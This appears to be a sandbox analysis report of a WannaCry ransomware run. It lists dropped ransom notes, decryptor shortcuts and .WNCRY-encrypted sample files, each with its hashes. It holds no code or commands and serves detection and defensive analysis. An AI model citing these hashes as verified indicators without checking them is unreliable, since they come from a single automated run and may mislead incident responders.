  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\ProgramData\Microsoft\Windows NT\MSScan\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\ProgramData\Microsoft\Windows NT\MSScan\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\ProgramData\Microsoft\Windows\Caches\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\ProgramData\Microsoft\Windows\Caches\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\ProgramData\Microsoft\Windows\Ringtones\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\ProgramData\Microsoft\Windows\Ringtones\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\Users\All Users\Documents\My Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRY (copy)
  • Type:
  • MD5: 49C828971D2FC674A1CB1CEC7B7E21AA
  • SHA: 67401EEC52B2A93677A79610D8C36B4E42556963
  • SHA-256: 6EDC9E06F63BA1D5C2B591F33E02737C70F9525CB9D01B982795C765BF02E7D3
  • SHA-512: 664463B3E903CD297C0FF965E3E336558284FBCA5D357457C2B7AAED324E46B750C17A11983D546EAFC249187B2D403693EE2886462F032CA076B127A70DDC3D
false
C:\Users\All Users\Documents\My Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRY (copy)
  • Type:
  • MD5: C34784153FC95C919DC53B73A4BCF992
  • SHA: 61FF49DA6FAA3E8374B2B27C8257DEFB70920B6A
  • SHA-256: 667B3478752CD5391925DE087A770B410DA41D65178FD6C2BADF9EC2B3391D20
  • SHA-512: 81F49EB041AE41D135392BDE066831E97266F6C1EF1CC32B002CEABC424DF6A9A9FECDDC6140B152DC39966CB65C343BC3D50E1E506658A53B3BAD48344B7C09
false
C:\Users\All Users\Documents\My Music\Sample Music\Kalimba.mp3.WNCRY (copy)
  • Type:
  • MD5: AAB0080DFCE8E084C6C7AB55BE5333CC
  • SHA: 8E8FDE128E3055BDACF3697163AF5F6C0D7A258A
  • SHA-256: B49BF5A414134B8D0C091AEB4069D45EBBA2CD4EDB8FABBFA47273E7AA6BFDA9
  • SHA-512: 3B21DCAE2C84A1B3CBC33F24F1B53FB162651842A4F2CFA97618FB0BD8C7F6E8BC1F8E75DD6E221FFF25384A1C2AA11F4C23667BA803BF77EDC41836FDE15012
false
C:\Users\All Users\Documents\My Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRY (copy)
  • Type:
  • MD5: 5C281348E9B18DAB259DF17C92592E45
  • SHA: 4759E29887A8A7B85D7595E83A2B700612318768
  • SHA-256: B68A7596BEA6FD5F05FDCE31CA46DD9B90B73AD210DB4E9E76E714745B4ADECC
  • SHA-512: B9C3F80D61A3B3C628F0A8F33D92E095D36B124C5C741D600E8727498D9404CE0FC4E252F9256AB2678D237BA2EE921D4413F16A8D5ADA483D2C95A7E1D96C06
false
C:\Users\All Users\Documents\My Music\Sample Music\Sleep Away.mp3.WNCRY (copy)
  • Type:
  • MD5: F245CA3520A5178A555DC1EE77116B48
  • SHA: D52BE5C836B601022CFAA586A754820495CB370A
  • SHA-256: A312113AF490519EB8A186AC19F9FB3C3A337235ECCEA880E95AE84715DF40DD
  • SHA-512: 29CC645752EDA84E9D18F1DABC7554C73AD54FF652B0C21159BC69AE515E62E253780742172105D14EEF91630563181071FACD727C0196F141C79A39A3D3F1F7
false
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRY (copy)
  • Type:
  • MD5: 39DADC5A03DC99727DA131007D1E5FDA
  • SHA: 4BA521C009B0F40A47054E4C8EA51C8C088A9C54
  • SHA-256: 9962531BCC4CCADF34384FCFCEADE937242FCBA93CC1DC70D71F793D89ADBC2E
  • SHA-512: 7436C2F8C99F9A10E0BB4AFAACCEDD73F8A481AFC694A6B60ABCAA6C576BF6B8C834F9FA49B47227C9441177833DD8BA6A608C80E2DC3FE617B2996BAD459ABC
false
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Desert.jpg.WNCRY (copy)
  • Type:
  • MD5: 448E48B8698D4C4469AEEBC16A21C177
  • SHA: 7D65FD629FAD02E346899E812A4630D446420CB7
  • SHA-256: 4432364AA358E8C9574CFF7D20F846B94B9C4FB8CE8113C7A064F3A98798B173
  • SHA-512: F10584001838FB7E07D0C040D4EDD3C3025B71BAE3174AA2EE14D9F1C89335409D78510C881F615C565A8E0D91E74E348351B97E0FD3834EA7A901818E93082D
false
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Hydrangeas.jpg.WNCRY (copy)
  • Type:
  • MD5: 7F548E56DF2912CE3F33AB813C0EB0B3
  • SHA: 96F7105013707A4BE2C722A4DBCB24FA42A23958
  • SHA-256: 81F9A6303D4CA2E1D1532F638104FBB3A3308744511828167B2A6B28451865CE
  • SHA-512: 9B79D5C8DF4B3DC10A035E66CC50C66A629FC05FD66658627EAFE73CA1781648C9BCB9630165FA2B173F22F20A4317F3FE177B67CF4CFC2FBFF98ECC66D9B411
false
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Jellyfish.jpg.WNCRY (copy)
  • Type:
  • MD5: 2F78881E370B2191E77F110EE407633F
  • SHA: 96E08B39C833150667E0E189BA9C2EBA2FA85231
  • SHA-256: 721459C62E761A7E5D7FB2059EBF511D189179F706FF32C7586532B1E72C3161
  • SHA-512: CD1B8961D4D695D537B8A65B5FA4264A0F8A8A9F7814330B147F1B9298E5D39A79A0450D1846D3E96C086956C3F92564A627DC492B27AE3FA1ED3F65453A1411
false
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Koala.jpg.WNCRY (copy)
  • Type:
  • MD5: 5C34418ADA028B6D32AB27AA2878918C
  • SHA: 80E717D0A8E0149A35D8C3F9F7472D7BF0DE2352
  • SHA-256: A6202C83C2A1510220E7604F76E2BB4CF3EE2894363E6DAAA9F0DD1F6573B459
  • SHA-512: 03099DCC7F8F173ED94B48434121DA9FE4353CE89360A1DE15B4B3835B99ED80C3DB5375BCDAA1F65C9A3DA1E76F88789074FC09B76C50328F3E25E184363398
false
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Lighthouse.jpg.WNCRY (copy)
  • Type:
  • MD5: B94645DD53EAB2EF06A0357ECEB2A09A
  • SHA: E84F0E49F5E3B1B1BEEF595B6EEA35DC9BDD17AC
  • SHA-256: 93FBD732E3720A9D916CB57D97451AB2DD672DA613095470860293BF42B5FE1F
  • SHA-512: 819EE35745AD1D87DAF461E6C9B19483E5205F1F92F10F1F1CB7DB8DCAA1860F533FF4E736BEB8D087719FBA10087CDC67308648E44AD69AE8A9DC14A078828D
false
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Penguins.jpg.WNCRY (copy)
  • Type:
  • MD5: 1AA97AFF78C061DDC45C70787D9A5F3F
  • SHA: 84C0AEE18F2596F3FAF6F63F76F53C0F33E953DE
  • SHA-256: C775CDC85B9E636DA2F0518B2AD86B6C6B0EFE02ED208E65F314DDD9A442C990
  • SHA-512: A4ED9A4130654B890FF55BB25984D437454DFA93B1762E9ED24C09CBFAAD6C427DC067B6DA39487CE13A231D9F81F32CFE806B1B72B4D7F085D609B6CD524CC5
false
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Tulips.jpg.WNCRY (copy)
  • Type:
  • MD5: A2440FDE88EB4EEB8A340F2C290C4077
  • SHA: 0A11905283E8F7144D4BDB8378FF199229DEA008
  • SHA-256: 49B8675B9C0E3D1CA04948BF3497FADC9DC95428262ADD5E21C0B46CE283CAAF
  • SHA-512: 82B61B8CF29A7DB72BF6544C2446A3D70BF8495F7263511095051089F06046FB8C763EAF412EBE36D5051DDF1AD42CEEFA12192851E88EA895C3EC4734752D18
false
C:\Users\All Users\Documents\My Videos\Sample Videos\Wildlife.wmv.WNCRY (copy)
  • Type:
  • MD5: FEC719C2256527344D0F8BD96DA94091
  • SHA: AA50EB406E95C7286C3D2213979EEDA3A73D03C0
  • SHA-256: B2B407C9D82B66F24EE1D8B5D1D7C78E1050855A6AAB3824DDC631AB53C55370
  • SHA-512: A92D87EC9397FA14E11498BC6A47AE274825C837871F6D5FA5E08B56B572DB4E1022FF09CC0A2BD6E4EAF0E3ACDD8D59210D2F7B5FFADE24EBAC37E29B258BAF
false
C:\Users\LUKETA~1\AppData\Local\Temp\0.WNCRYT (copy)
  • Type:
  • MD5: 5EFE02B26FE191C9E6E1652FD7D26768
  • SHA: 356F51DC81B5C4C7ABE40EB5CFB3359689A1B1A3
  • SHA-256: AEE5BEC6697F5C16FD9882DFD475A16D4D12A926F3D20C309E2D15794D88F74A
  • SHA-512: E7655BA2D51604E5495B9935E69BEBBE4EDE40500B7B76427C5CD02A10BE6EE9327ED52774FABA94C760557E128EAFFF6B01E4A9B139E5C21A69FDD1AA01D907
false
C:\Users\LUKETA~1\AppData\Local\Temp\1.WNCRYT (copy)
  • Type:
  • MD5: D5BE8434FA730E3B26BCF004B4B897F5
  • SHA: 84BC8167B842991D1B4E5F9E8A51657DA26D9AA9
  • SHA-256: F609C3B2E99D2ABA8278C8ECFCAC8AA0AA898FE751CCE0202DEC08DC42C5D351
  • SHA-512: 65325D644CED814630104FD0CA73E28D8390236AE3A7B657D2E658B4C3BE1B0F74D95171E0F4CB83B2ECA36606D3948894A4D522D86700AC01051B517E608284
false
C:\Users\LUKETA~1\AppData\Local\Temp\10.WNCRYT (copy)
  • Type:
  • MD5: E4F9CD48768327A8685162AF3F3DE6EC
  • SHA: 1EEB29B7A09EC684BDA396987F0E94A139772E2C
  • SHA-256: 4E35271175AF7185E87E02503484C1241C43A0716DD9D9A3BF593125D7CE8BC9
  • SHA-512: 385F1A1184B35FB4B20DD9E6E2AEC5C6519D1D8DCDDB2DD5B2A2D3EF563924C6040452652D623D9F5B7E8A68C93CFA227109ACDE94306FFFF1D308F7D14272BC
false
C:\Users\LUKETA~1\AppData\Local\Temp\11.WNCRYT (copy)
  • Type:
  • MD5: 5C623FAF27B01ED03EADCA831E2117D1
  • SHA: 578107BEEDCB17CE38C7AD5F6E2F1B93BA4330B0
  • SHA-256: F31199A036DBE388195B7257481AA365893EC205675DA7D5585D3827DC61EAAF
  • SHA-512: 1E2EFFE24509064DA971A1D28A362EF839A094A714C92E1C963172455613E96BB14E1890422772054B4FBF15CCC5B825856F37AD8F5178B2F53D575291F61A1B
false
C:\Users\LUKETA~1\AppData\Local\Temp\12.WNCRYT (copy)
  • Type:
  • MD5: E2002A5752E60BBA93D9C46A23824181
  • SHA: ABA8383A70FC4A1DF6C26D0A4AB6DD7E5ECD8871
  • SHA-256: 3EFD801B8520D1DC77DC12797EE82857B51E73E23221533BD98D089B2194430C
  • SHA-512: 14D4465F489615C427D99D28E8FCB3D65DC94A269325DA3498FAFA917AE0BB934D51FECED8851FAF1386A32802F3ED7C2D7C0A84FA684F229F73373624594F42
false
C:\Users\LUKETA~1\AppData\Local\Temp\13.WNCRYT (copy)
  • Type:
  • MD5: 2DE2316658983715E44B777F2BE90F86
  • SHA: 46FBDD167F36F5C5D9B53885418C0E91CC7C0187
  • SHA-256: E31E5F130E96C204E2B3AD29010581F6845AF209D00BA2A1E5BCBDFA090ABE88
  • SHA-512: D1BA09CA0864A6A135B8BBBDB761DF307F18A86A64284824088D152197D5DCFEA4B941C32BC595B938A21A0C4DDE1415E4D8760EE30D9D23A6E89863CDAB04F9
false
C:\Users\LUKETA~1\AppData\Local\Temp\2.WNCRYT (copy)
  • Type:
  • MD5: F9C503484042D842A205C2976298C956
  • SHA: AF7DF962BC51724BA8BF7E2262F42A0CB19EF841
  • SHA-256: 2D6059C8DC9FF07C1286FB22EB1928966CD83A669BF7B54C97594FA81CB535A3
  • SHA-512: DED2B455514B27505BCCB7F686C5E24CD45B1864E31EF924B434AD8282BC107C462943B2E2A3B0E22BCCD21E52B507F9C610CF6601D26DEFD8E8C8BA3AB2236A
false
C:\Users\LUKETA~1\AppData\Local\Temp\3.WNCRYT (copy)
  • Type:
  • MD5: 698E17579B6E804241750071AD98D431
  • SHA: 4F4C7A547583509F31C5D050C2969311B6FF1127
  • SHA-256: 3F86BA1CAF0F2F2C6B8B518204B948887807B42797CCB65F4D3073B70C85C012
  • SHA-512: 02721F7C53192FFC8955A8159D42BC69B1E5A5D9EF33F658B59E9DF12C6C3473B106B7FA433D4DF0B438B485B9C2CE1342A2055E6216FC2276CE36D535FA8D62
false
C:\Users\LUKETA~1\AppData\Local\Temp\4.WNCRYT (copy)
  • Type:
  • MD5: BB90EA179267594A834A7FEFAE287DB9
  • SHA: 1174D386260B83787F8FDB6FFB8AA03039D71A1A
  • SHA-256: 36C118A2C007EB9EBACEB4731C50DEC6240E5DF90331B01B103398129A8C09CC
  • SHA-512: 3648FFD7AB0341A6296795F9DECC35F9A888FECF2224593CEB9A46A291A003772CC49D17AA64D15C024AABAF46068B7B7A508823227FE9AC34FFBBB4858A31B7
false
C:\Users\LUKETA~1\AppData\Local\Temp\5.WNCRYT (copy)
  • Type:
  • MD5: 776D725B47982BBCB53F5AFF09053D58
  • SHA: 0BEFC0AD17C1C9D967239742BE25220B556DF43B
  • SHA-256: 8CFD1D039879B39411B53757CA0A77B9DBC5D194D74481009B6A84A85E424B01
  • SHA-512: 0E0B799F160393E270B686393D62A0ED2F8A6AE7127284EC7E595B5870F8040ED7BF56B1C38E749C028981466B2683B9CF378284E6D613E12E27A0D607FD0B90
false
C:\Users\LUKETA~1\AppData\Local\Temp\6.WNCRYT (copy)
  • Type:
  • MD5: C7880A1D809BF6870D9441162BDE5B59
  • SHA: CF7BC7686C2DCADCBC8E5A085E0B4FE7EB84A9AB
  • SHA-256: 6F9B03130F125D2220C95DF34FE0D1CEF6DBBE664E3BC623C1A329ADC32F0A5F
  • SHA-512: B95DCBB9ED3F8CFABE3CCEFA9566853A719A8A5384C6B805BA96292C651920C48574C0C4DDA6B329738BAE5C987127EEDE755D101AD260550795027A40A8ADA6
false
C:\Users\LUKETA~1\AppData\Local\Temp\7.WNCRYT (copy)
  • Type:
  • MD5: 2AFF0EFB7A2FD01925491591F7553773
  • SHA: 76B3E89A3D841E1C1AC211C1C0310F5766E30AC6
  • SHA-256: 414F1EE99965BF581C60C944CF719643AD8C2AA9DBAEFB7D6C161D4954316014
  • SHA-512: B1925829234F32DCEEADA00214EE915EA2891238419BF6EAB3EFCD630A7E6E9D41FF7F70F74EA5A64E372F61F14208A6283EE81D3ED5E9CEB3C4E89FA9ACD63F
false
C:\Users\LUKETA~1\AppData\Local\Temp\8.WNCRYT (copy)
  • Type:
  • MD5: FB58407D7334AA694ABC0FDCEA32083F
  • SHA: ECD0AE7E0D5B6364A2AA8A9980052EA5DD0C93B9
  • SHA-256: 3AFC6BEA4506B117CD468C82660A04CE3FB0DEBB25DC56D9F7D45EAB6DB64867
  • SHA-512: 9190197DB213EB4993476654DCC63318F8F92DBF42C2A5628DC22DFFBADA00F43F4FE4F53E045E00DF71363686F0D9AA70A5E10A3C66193EC5C286FD4A03E4D2
false
C:\Users\LUKETA~1\AppData\Local\Temp\9.WNCRYT (copy)
  • Type:
  • MD5: F2F1DFF1D94A06EA8E6061798E2AF586
  • SHA: EB9AE6BE1BBB9D4B46A6967A7C19EDE54B0CE572
  • SHA-256: 2F783C36F65F1637DFF8D787415D85F4EA2163FF68E305B20F06680EEBCEB47B
  • SHA-512: A8C3C1897674BDBB87FB295C1233B6008DECBEEE742061B58506355ADC136BCDF9B074F3D4A8712942DC8F63258344D1C12DBDF97F0AD9BDAB1B0B7645105AFE
false
C:\Users\Public\Music\Sample Music\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\Users\Public\Music\Sample Music\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Kalimba.mp3
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\Users\Public\Pictures\Sample Pictures\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
